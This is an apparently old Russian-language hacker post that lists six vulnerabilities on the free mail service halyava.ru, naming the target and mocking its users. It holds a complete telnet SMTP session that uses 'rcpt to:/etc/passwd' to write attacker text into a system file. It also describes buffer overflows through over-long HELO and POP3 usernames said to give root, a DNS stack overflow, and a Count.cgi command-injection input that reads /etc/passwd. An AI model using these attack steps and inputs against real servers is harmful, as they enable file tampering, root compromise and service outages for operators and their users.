Спешу обрадовать пользователей
halyava.ru - сегодня обнаружено 6 дыр на этом freehome...)))
Как прекрасен этот мир, иногда хочется верить в
полную анонимность своих почтовых ящиков и
крутость, бессонными ночами созданных паг)... Ну
хватит лирики. Поговорим о деле.
Баг #1:
port smtp (tcp/25)
этот баг аналогичен багу, который был найден мной
на hotmail.ru (см. статью БАГ в HOTMAIL.RU).
Баг #2:
port smtp (tcp/25)
Сей баг дает право напрямую писать в файл на
удаленной UNIX машине. выглядит это примерно так:
[root@gwx3 mail]
# telnet www.halyava.ru 25
Trying 195.90.131.194...
Connected to www.halyava.ru.
Escape character is '^]'.
220 XYZZY ESMTP
helo broadcast.com
250 XYZZY
mail from : foo@go.net
250 ok
rcpt to :/etc/passwd
250 ok
data
354 go ahead
WELCOME TO HELL.NICE TIME FOR WEBKILLERS
.
250 ok 965026748 qp 17926
quit
221 XYZZY
Connection closed by foreign host.
Содержимое мессаги пишеться напрямую в
указанный в rcpt to файл))).
Баг #3
port smtp (tcp/25)
Ну это тоже типовой баг переполнение буфера smtp:
при коннекте на 25 порт и сообщении параметра HELO
свыше 10000 symb, sendmail тихо умирает или если запущен
remote shell (а он запущен) дает доступ с правами root.
Баг #4
port DNS (tcp/53)
Классика)) Срыв стека по 53 порту. Одно лишь
пожелание сис админам: Люди , не запускайте named от
рута)) или хотябы делайте апгрейд до bind 8.2.2-P3
Баг #5
port www (tcp/80)
Установлен Count.cgi (мало того, что установлен, так
еще и работает)
ЧТО МОЖНО СДЕЛАТЬ? ПОИМЕТЬ ... с правами httpd )))
дайте ему на вход нечто типа : paramname=/bin/ls /etc/passwd ,
предварительно переполнив всякой дрянью буфер.
Баг #6
port pop3 (tcp/110)
При сообщении имени юзера свыше 10000 symb происходит
переполнение
буфера, результат - мертвый pop3 и free root exec на
удаленной UNIX
машине.
Вот и верь после этого людям.........